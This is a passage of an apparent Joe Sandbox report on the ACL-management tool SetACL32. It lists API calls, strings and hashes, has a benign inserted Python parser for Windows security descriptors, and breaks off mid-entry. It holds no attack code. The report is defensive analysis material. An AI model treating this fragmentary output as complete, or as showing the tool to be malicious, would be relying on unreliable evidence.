                • std::locale::_Init.LIBCPMT ref: 00F70B6C
                • std::locale::_Init.LIBCPMT ref: 00F70C3F
                • std::locale::_Init.LIBCPMT ref: 00F70C91
                • std::locale::_Init.LIBCPMT ref: 00F71019
                Similarity
                • API ID: std::locale::_$Init$Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocale
                • String ID: 0$Prepare$T$X$You specified inheritance flags, which is incompatible with man_docs. Your flags are being ignored in order to be able to set stan$full$man_docs$man_printer$manage_documents$manage_printer$print
                • API String ID: 1949052339-2776946339
                • Opcode ID: cd42686bb67832b10ab6848109d81a5cdd749557d71c0650284fe10dc2186d0e
                • Instruction ID: db32377fcbdd590ecbc04757e740c075beef62f309dfe4ef34bea1bb3a471778
                • Opcode Fuzzy Hash: cd42686bb67832b10ab6848109d81a5cdd749557d71c0650284fe10dc2186d0e
                • Instruction Fuzzy Hash: 4B12BB71E00258CFDB24DB68CC85BDDB7B1AF45304F14809AD949AB382DB75AE84EF52
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsValidAcl.ADVAPI32(?,?,?,00000000), ref: 00F83161
                • GetAce.ADVAPI32(?,?,00000000,?,?,00000000), ref: 00F83178
                • GetLastError.KERNEL32(?,?,00000000), ref: 00F83182
                • DeleteAce.ADVAPI32(?,?,?,?,00000000), ref: 00F831A6
                • GetLastError.KERNEL32(?,?,00000000), ref: 00F831B0
                Similarity
                • API ID: ErrorLast$DeleteValid
                • String ID: @M)w
                • API String ID: 2912457363-1211491014
                • Opcode ID: a6dbd11af4f255c62ac00785a043da53049389fa91596b9def9bdebf44dda5f4
                • Instruction ID: 9a7e24df92f4a2fb72d2193763217797f9a57c60284e97ed810f8664c20c926d
                • Opcode Fuzzy Hash: a6dbd11af4f255c62ac00785a043da53049389fa91596b9def9bdebf44dda5f4
                • Instruction Fuzzy Hash: D161A3B0E05249AFDB119FA4CC95FFF7BB8BF09710F044458E901A3251D7749A04EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsValidAcl.ADVAPI32(?,?,?,00000000), ref: 00F82FB4
                • GetAclInformation.ADVAPI32(?,00000000,0000000C,00000002,?,?,00000000), ref: 00F82FCB
                • GetLastError.KERNEL32(?,?,00000000), ref: 00F82FD5
                • GetLengthSid.ADVAPI32(00000000,?,?,00000000), ref: 00F82FE6
                • GetLastError.KERNEL32(00000000), ref: 00F83003
                • GetLastError.KERNEL32 ref: 00F830FA
                Similarity
                • API ID: ErrorLast$InformationLengthValid
                • String ID: @M)w
                • API String ID: 2808191216-1211491014
                • Opcode ID: fcbe7968a7a68dfda3c40d6d1a2d468dd82fa4430e3f5de88bff49f772e98397
                • Instruction ID: f76ec108bf1615c7853ecf57d527010e5f4556888e5ecfee38ca70fd7076c5d9
                • Opcode Fuzzy Hash: fcbe7968a7a68dfda3c40d6d1a2d468dd82fa4430e3f5de88bff49f772e98397
                • Instruction Fuzzy Hash: 234191B1E042199BDF10AFA4DC49AFF77B8BF05B14F044159E902A7251D7749A01EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F89383
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                • std::locale::_Init.LIBCPMT ref: 00F893DA
                • std::locale::_Init.LIBCPMT ref: 00F89431
                • std::locale::_Init.LIBCPMT ref: 00F89483
                • std::locale::_Init.LIBCPMT ref: 00F894DA
                • std::locale::_Init.LIBCPMT ref: 00F89531
                • std::locale::_Init.LIBCPMT ref: 00F89584
                Similarity
                • API ID: std::locale::_$Init$Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocale
                • String ID: Font Driver Host$IIS AppPool$NT AUTHORITY$NT SERVICE$NT VIRTUAL MACHINE$WINDOW MANAGER
                • API String ID: 1949052339-1101167501
                • Opcode ID: 01d7670d53792d135a801c501834ca384eed638949baed86002ea2660948dddc
                • Instruction ID: 214d760d3d86968bc1282c3a5608e188c737b012b9b03d9298abb365d962078c
                • Opcode Fuzzy Hash: 01d7670d53792d135a801c501834ca384eed638949baed86002ea2660948dddc
                • Instruction Fuzzy Hash: D281C0B1F016059FCB10EF64D840BBEB7A5AB85724F184268D841AF3C5DBB69E06A790
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID: _free$Info
                • String ID:
                • API String ID: 2509303402-0
                • Opcode ID: 62b9533f205f012bd570a7f9f60ff8f5ff85c993981218546cfe83d1d43968cd
                • Instruction ID: 5612105e2d9b59543d1a10f115d3247b704ed8e2b931bfc1169a25e42c467d0b
                • Opcode Fuzzy Hash: 62b9533f205f012bd570a7f9f60ff8f5ff85c993981218546cfe83d1d43968cd
                • Instruction Fuzzy Hash: 2ED1FF71D007059FEF22DFA8C881BEEBBF5BF09710F544129E494A7292DB74A845EB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___free_lconv_mon.LIBCMT ref: 00F9861F
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F9748F
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974A1
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974B3
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974C5
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974D7
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974E9
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974FB
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F9750D
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F9751F
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F97531
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F97543
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F97555
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F97567
                • _free.LIBCMT ref: 00F98614
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • _free.LIBCMT ref: 00F98636
                • _free.LIBCMT ref: 00F9864B
                • _free.LIBCMT ref: 00F98656
                • _free.LIBCMT ref: 00F98678
                • _free.LIBCMT ref: 00F9868B
                • _free.LIBCMT ref: 00F98699
                • _free.LIBCMT ref: 00F986A4
                • _free.LIBCMT ref: 00F986DC
                • _free.LIBCMT ref: 00F986E3
                • _free.LIBCMT ref: 00F98700
                • _free.LIBCMT ref: 00F98718
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: bbeaa21a40617438003eb7f82b31e562f3b08448d83e3aa5a29d043ca586a3db
                • Instruction ID: 7632aaa4fa192373f1f2690239f8d8ae45bf0638aa070abe9d38427bf70bbd15
                • Opcode Fuzzy Hash: bbeaa21a40617438003eb7f82b31e562f3b08448d83e3aa5a29d043ca586a3db
                • Instruction Fuzzy Hash: F0313B32A003019BFF31AE78DC45B5673E9AF023A0F145429E055DB1A6DF75AC86FB10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F83B30
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                • CoInitialize.OLE32(00000000), ref: 00F83C93
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000002,00000000), ref: 00F83CBF
                • CoCreateInstance.OLE32(00FAF698,00000000,00000001,00FAF6A8,00000000), ref: 00F83CE9
                • SysAllocStringLen.OLEAUT32(00F80CBD,00000000), ref: 00F83D08
                • SysFreeString.OLEAUT32(00000000), ref: 00F83D2D
                • CoQueryProxyBlanket.OLE32(00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 00F83D57
                • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,?,00000003,000000FF,00000800), ref: 00F83D76
                • CoUninitialize.OLE32 ref: 00F83DC1
                  • Part of subcall function 00F837A0: SysAllocString.OLEAUT32(__systemsecurity=@), ref: 00F83801
                  • Part of subcall function 00F837A0: SysAllocString.OLEAUT32(GetSD), ref: 00F83854
                  • Part of subcall function 00F837A0: SysFreeString.OLEAUT32(-00000001), ref: 00F83A2E
                • VariantClear.OLEAUT32 ref: 00F83E31
                Similarity
                • API ID: String$Alloc$BlanketFreeInitializeLockitProxystd::_std::locale::_$ClearCreateH_prolog3InitInstanceLockit::_Lockit::~_QuerySecuritySetgloballocaleUninitializeVariant
                • String ID: \\.\
                • API String ID: 3821683838-2900601889
                • Opcode ID: e1a690284c239c2b9949215351f1d6a6e98725b4df3e4b9b45ef5726f7c2687d
                • Instruction ID: 50eafefe2df8573ec548a8753a0dfa9f23d363814a586e94df5e719a7ca713d3
                • Opcode Fuzzy Hash: e1a690284c239c2b9949215351f1d6a6e98725b4df3e4b9b45ef5726f7c2687d
                • Instruction Fuzzy Hash: 9CA1F271A00108AFDB04EFA4DC85FDE7BB9EF85720F244218F511AB2E0DB74AA45DB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00FA6E9C: CreateFileW.KERNEL32(00000000,00000000,?,00FA71FE,?,?,00000000,?,00FA71FE,00000000,0000000C), ref: 00FA6EB9
                • GetLastError.KERNEL32 ref: 00FA7269
                • __dosmaperr.LIBCMT ref: 00FA7270
                • GetFileType.KERNEL32(00000000), ref: 00FA727C
                • GetLastError.KERNEL32 ref: 00FA7286
                • __dosmaperr.LIBCMT ref: 00FA728F
                • CloseHandle.KERNEL32(00000000), ref: 00FA72AF
                • CloseHandle.KERNEL32(00000000), ref: 00FA73FC
                • GetLastError.KERNEL32 ref: 00FA742E
                • __dosmaperr.LIBCMT ref: 00FA7435
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: @M)w$H
                • API String ID: 4237864984-462586194
                • Opcode ID: e2c7333d58d8b2d9484c7db778386d5d0d5dab2c27e54f561a5599a482cd663d
                • Instruction ID: 026086f82a125ef42d7c952696f5766c11c40648a7442dee084031485491e219
                • Opcode Fuzzy Hash: e2c7333d58d8b2d9484c7db778386d5d0d5dab2c27e54f561a5599a482cd663d
                • Instruction Fuzzy Hash: 68A12972A042488FCF19EF68DC52BAE3BE5AB07320F140159F811EF291D7399D16EB51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,746D712B), ref: 00F82C89
                • GetLastError.KERNEL32 ref: 00F82C93
                • GetAce.ADVAPI32(?,00000000,00000000), ref: 00F82CB8
                • IsValidSid.ADVAPI32(-00000008), ref: 00F82CDA
                • IsValidSid.ADVAPI32(-00000008), ref: 00F82CFC
                • GetLengthSid.ADVAPI32(-00000008), ref: 00F82D07
                • CopySid.ADVAPI32(?,00000000,-00000008), ref: 00F82D26
                Similarity
                • API ID: Valid$CopyErrorInformationLastLength
                • String ID: @M)w
                • API String ID: 480852179-1211491014
                • Opcode ID: 2b5b8db70b06c8b1016a105bbe8cc078d3559113c6f523918f8d68d0c7cc3b5c
                • Instruction ID: 5ae9a2591b622de6d889e041ba759e5437f6d96396c2e60bef4a34104a35a6b4
                • Opcode Fuzzy Hash: 2b5b8db70b06c8b1016a105bbe8cc078d3559113c6f523918f8d68d0c7cc3b5c
                • Instruction Fuzzy Hash: 0081B3B1E002589BDF50EFA4CD84BDEBBB8FF04710F144519E805EB245D778AA44EBA0
                Uniqueness

                Uniqueness Score: -1.00%
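Several of the SetACL32 functions listed above walk the same three byte layouts by hand: a self-relative SECURITY_DESCRIPTOR (what the __systemsecurity GetSD call returns through SafeArrayAccessData), the ACL header read by GetAclInformation, and the ACE/SID records read by GetAce, GetLengthSid and CopySid, with DeleteAce used to drop entries. The parser below is an added example written for this report, not code from SetACL32, Joe Sandbox or the analysed sample; it reproduces those structures in pure Python so the sequence can be followed offline, and the security descriptor it parses is constructed inline (the build_* helpers and the SAMPLE_* names are the example's own, not anything recovered from the binary).

```python
import struct

# Constants from winnt.h
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_DENIED_ACE_TYPE = 0x01
OBJECT_INHERIT_ACE = 0x01
CONTAINER_INHERIT_ACE = 0x02
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FILE_ALL_ACCESS = 0x001F01FF
FILE_GENERIC_READ = 0x00120089


def sid_length(buf, off):
    """IsValidSid + GetLengthSid: 8-byte header plus 4 bytes per sub-authority."""
    revision, sub_count = buf[off], buf[off + 1]
    if revision != 1 or sub_count > 15:
        raise ValueError("invalid SID at offset %d" % off)
    return 8 + 4 * sub_count


def sid_to_string(buf, off):
    """CopySid followed by ConvertSidToStringSid: S-1-<authority>-<sub>-..."""
    length = sid_length(buf, off)
    if off + length > len(buf):
        raise ValueError("SID runs past end of buffer")
    sub_count = buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")   # 48-bit, big-endian
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs)


def parse_acl(buf, off):
    """IsValidAcl, GetAclInformation (AclSizeInformation), then GetAce per entry.
    Returns a list of (ace_type, ace_flags, access_mask, sid_string)."""
    revision, _sbz1, acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", buf, off)
    if revision not in (2, 4) or acl_size < 8 or off + acl_size > len(buf):
        raise ValueError("invalid ACL at offset %d" % off)
    aces, pos = [], off + 8
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", buf, pos)
        if ace_size < 8 or pos + ace_size > off + acl_size:
            raise ValueError("ACE runs past end of ACL")
        mask, = struct.unpack_from("<I", buf, pos + 4)
        aces.append((ace_type, ace_flags, mask, sid_to_string(buf, pos + 8)))
        pos += ace_size
    return aces


def delete_ace(acl, index):
    """DeleteAce: drop the ACE at `index` and return a compact copy of the ACL.
    Win32 DeleteAce edits in place and leaves AclSize (the buffer size) alone;
    this copy shrinks AclSize so the result is a minimal blob."""
    revision, _sbz1, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", acl, 0)
    raw, pos = [], 8
    for _ in range(ace_count):
        ace_size = struct.unpack_from("<H", acl, pos + 2)[0]
        raw.append(acl[pos:pos + ace_size])
        pos += ace_size
    del raw[index]                      # IndexError here mirrors a DeleteAce failure
    body = b"".join(raw)
    return struct.pack("<BBHHH", revision, 0, 8 + len(body), len(raw), 0) + body


def parse_self_relative_sd(sd):
    """Walk a SECURITY_DESCRIPTOR_RELATIVE such as the byte array returned by
    __SystemSecurity.GetSD. Returns (owner_sid_string, dacl_entries_or_None)."""
    revision, _sbz1, control, off_owner, _off_group, _off_sacl, off_dacl = \
        struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    owner = sid_to_string(sd, off_owner) if off_owner else None
    dacl = parse_acl(sd, off_dacl) if (control & SE_DACL_PRESENT and off_dacl) else None
    return owner, dacl


# --- constructed sample input (this example's own, not taken from the sample) ---
def build_sid(authority, *subs):
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def build_ace(ace_type, flags, mask, sid):
    return struct.pack("<BBHI", ace_type, flags, 8 + len(sid), mask) + sid


def build_acl(aces):
    body = b"".join(aces)
    return struct.pack("<BBHHH", 2, 0, 8 + len(body), len(aces), 0) + body


ADMINS, GUESTS, EVERYONE = build_sid(5, 32, 544), build_sid(5, 32, 546), build_sid(1, 0)
SAMPLE_DACL = build_acl([
    build_ace(ACCESS_ALLOWED_ACE_TYPE, 0, FILE_ALL_ACCESS, ADMINS),
    build_ace(ACCESS_DENIED_ACE_TYPE, 0, FILE_ALL_ACCESS, GUESTS),
    build_ace(ACCESS_ALLOWED_ACE_TYPE, OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE, FILE_GENERIC_READ, EVERYONE),
])
# 20-byte header, owner SID right after it, DACL after the owner
SAMPLE_SD = (struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 20, 0, 0, 20 + len(ADMINS))
             + ADMINS + SAMPLE_DACL)

if __name__ == "__main__":
    owner, dacl = parse_self_relative_sd(SAMPLE_SD)
    print("owner:", owner)
    for ace_type, flags, mask, sid in dacl:
        print("  %s flags=0x%02x mask=0x%08x %s" % ("ALLOW" if ace_type == 0 else "DENY ", flags, mask, sid))
    trimmed = delete_ace(SAMPLE_DACL, 2)
    print("after DeleteAce(2):", [a[3] for a in parse_acl(trimmed, 0)])
```

The bounds checks on AclSize and AceSize are the part worth keeping when reusing this on real dumps: a security descriptor pulled out of process memory or a WMI safe array may be truncated, and a naive walk that trusts AceCount alone will read past the buffer.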

                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: ec21166de93953b49ef616e6b33bb09ddd0ad6474e087fa91ec76af199dbf9ed
                • Instruction ID: edd730f3ab9751b7aa8631615b50385b48135b895350b7e067a21b1c9cac5051
                • Opcode Fuzzy Hash: ec21166de93953b49ef616e6b33bb09ddd0ad6474e087fa91ec76af199dbf9ed
                • Instruction Fuzzy Hash: 53C13476E44308ABEF20EBA8CC46FDE77F8AF08700F154165FA04EB282D6759941EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID:
                • String ID: @M)w
                • API String ID: 0-1211491014
                • Opcode ID: cc7444c3db22cf2820a0a2ce10f802231e4d5b40efb0c897275259b82c2dcc5a
                • Instruction ID: 9d7730bd8f41ed2320c782f2e9e62537625d70659a4c269f9b91e0a5a072865b
                • Opcode Fuzzy Hash: cc7444c3db22cf2820a0a2ce10f802231e4d5b40efb0c897275259b82c2dcc5a
                • Instruction Fuzzy Hash: 02C1E0B1E04649AFDF11DF98CC81BBEBBF4AF4A710F144059E911AB292C7789D41EB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F621B0: GetCurrentProcess.KERNEL32(00000028,?,746D712B), ref: 00F62208
                  • Part of subcall function 00F621B0: OpenProcessToken.ADVAPI32(00000000), ref: 00F6220F
                  • Part of subcall function 00F621B0: GetLastError.KERNEL32 ref: 00F62219
                • CreateFileW.KERNEL32(?,000C0000,00000000,00000000,00000003,02200000,00000000), ref: 00F806C3
                • GetLastError.KERNEL32 ref: 00F806E7
                • SetSecurityInfo.ADVAPI32(00000000,?,?,00000000,?,?,?), ref: 00F807DE
                • NetShareGetInfo.NETAPI32(-0000001C,?,00000001,00000000,00000000,?,?,746D712B,00FBFE30,00000003,00000000), ref: 00F809E6
                • NetApiBufferFree.NETAPI32(00000000), ref: 00F80A2E
                • SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,00000000,?,746D712B,00FBFE30,00000003,00000000), ref: 00F80A68
                • NetShareSetInfo.NETAPI32(-0000001C,?,00000001,?,00000000), ref: 00F80ABA
                • CloseHandle.KERNEL32(00000000), ref: 00F80AD7
                • RegCloseKey.ADVAPI32(00000000), ref: 00F80AE8
                Similarity
                • API ID: Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
                • String ID: @M)w$SeSecurityPrivilege
                • API String ID: 4090370659-2039830501
                • Opcode ID: 8fdffbf691abefc92b9eab0b570742525052aab2dc67dbdb2a2781a691ac098e
                • Instruction ID: 98e2e95f43b88ac2e2f19f928de2247826025b2f7d56a4d06a3bc1b78840fbbc
                • Opcode Fuzzy Hash: 8fdffbf691abefc92b9eab0b570742525052aab2dc67dbdb2a2781a691ac098e
                • Instruction Fuzzy Hash: 98C1D170E00219DBEF64EF64CC45BEE77B5AF44314F444199E809A7281DB74AE88DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 5ee1f7a8f0cfc0d5327362af5399dcd6aa3ba871907b0d5c077a3b63080e604c
                • Instruction ID: 877ad217040908eb56e8c80d1ad57dd346568fd9f41211938b9db845d699b51b
                • Opcode Fuzzy Hash: 5ee1f7a8f0cfc0d5327362af5399dcd6aa3ba871907b0d5c077a3b63080e604c
                • Instruction Fuzzy Hash: 30218776900108AFDF41EF94CC41DDE7BB9AF08380F0141A5F5159B166EB35EA99EF80
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateDirectoryW.KERNEL32(?,00000000,746D712B,?,?), ref: 00F851BB
                • GetLastError.KERNEL32 ref: 00F851C9
                  • Part of subcall function 00F688E0: GetLastError.KERNEL32(746D712B,00000000,00000000), ref: 00F68960
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                Similarity
                • API ID: ErrorLast$Time$CreateCriticalCurrentDirectoryEnterFileNameSectionSystemThreadUser
                • String ID: ' could not be created because: $@M)w$CreateDirectoryAPIWrapper$Created the directory '$Directory already exists: '$The directory '
                • API String ID: 3233469328-3060264401
                • Opcode ID: 8320b3cbfb2906812941f30eb419207dccc81b27fcd87af855a12ecded732a5b
                • Instruction ID: 1bc35020bc6bf17f2188f1a27ed0cf95f060a5c4300ccaaa02ac49edfbf00a20
                • Opcode Fuzzy Hash: 8320b3cbfb2906812941f30eb419207dccc81b27fcd87af855a12ecded732a5b
                • Instruction Fuzzy Hash: D1022531E00148DBEF08EF68CD85BDDB776EF85704F24C258E414AB296DB78AA84DB51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00F8E327
                • ___TypeMatch.LIBVCRUNTIME ref: 00F8E458
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00F8E52A
                • _UnwindNestedFrames.LIBCMT ref: 00F8E5AE
                • CallUnexpected.LIBVCRUNTIME ref: 00F8E5C9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwind
                • String ID: csm$csm$csm
                • API String ID: 1184646756-393685449
                • Opcode ID: 0ff08bc2c1d193610d767da126e8fc65be7250a23efc375711adbdcdfc36a7fe
                • Instruction ID: d4aeb1fbcb98787373a35ddfc5dc679ba1336b4720f7b14d3ca4dadefe67b56e
                • Opcode Fuzzy Hash: 0ff08bc2c1d193610d767da126e8fc65be7250a23efc375711adbdcdfc36a7fe
                • Instruction Fuzzy Hash: 2EB17872D00209EFCF29FFA4C8819EEBBB5BF14324B144159F815AB252E734DA51EB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F65D63
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F65D85
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65DA5
                • std::_Facet_Register.LIBCPMT ref: 00F65F73
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65F8B
                • Concurrency::cancel_current_task.LIBCPMT ref: 00F65FB0
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                • String ID: false$true
                • API String ID: 2081738530-2658103896
                • Opcode ID: 461c3296b321ee3e467ef483e4d939766463157ab4242c8bb30a273f2c6605a6
                • Instruction ID: e36619249a85b69d80717aeaf999a0cb38117ef9245f1b0a5022c53856c2bcf5
                • Opcode Fuzzy Hash: 461c3296b321ee3e467ef483e4d939766463157ab4242c8bb30a273f2c6605a6
                • Instruction Fuzzy Hash: 9791D0B1D00748DBDB20DFA4CC41BEEB7F4EF04714F14825AE845AB281EB75AA45DB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?), ref: 00F82551
                • GetLastError.KERNEL32 ref: 00F8255B
                • GetAce.ADVAPI32(?,00000000,00000000), ref: 00F82596
                • EqualSid.ADVAPI32(00000008,00000008), ref: 00F825D7
                • DeleteAce.ADVAPI32(?,00000000), ref: 00F8260E
                • GetLastError.KERNEL32(?,00000000,?), ref: 00F82647
                • GetLastError.KERNEL32 ref: 00F82700
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$DeleteEqualInformation
                • String ID: @M)w
                • API String ID: 1965898034-1211491014
                • Opcode ID: 09c49671800751d6ed5277ae541abd3c9a2d7f25ebb14594679ff441833c0fcd
                • Instruction ID: 3bc42d71c448be6453f5de52ad1e56dba9ecd740f392fd0c9a617dc0db1c4ddc
                • Opcode Fuzzy Hash: 09c49671800751d6ed5277ae541abd3c9a2d7f25ebb14594679ff441833c0fcd
                • Instruction Fuzzy Hash: BD71D1B1E002099BDB60EF69D8A5BEEB7E4FF04324F08411AE8059B241DB35ED50EBD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free_wcschr
                • String ID:
                • API String ID: 3422831350-0
                • Opcode ID: 727cb9bf0495dbe308845ea54ef2a9b68110a66bda30f49c157318a17082c216
                • Instruction ID: 47d37a3a314bc96a553f76c5c565a78805e98e9479bfbd2e596813440485262e
                • Opcode Fuzzy Hash: 727cb9bf0495dbe308845ea54ef2a9b68110a66bda30f49c157318a17082c216
                • Instruction Fuzzy Hash: B95116B2D003069BEF20AF74CC92A6AB7A4AF05324F15453AFA01D7281EB749D49B790
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: da15aaf098d3bf1ea6d7ba4770c2072ab3fceaa19f5f4405bfee0b70aa043d90
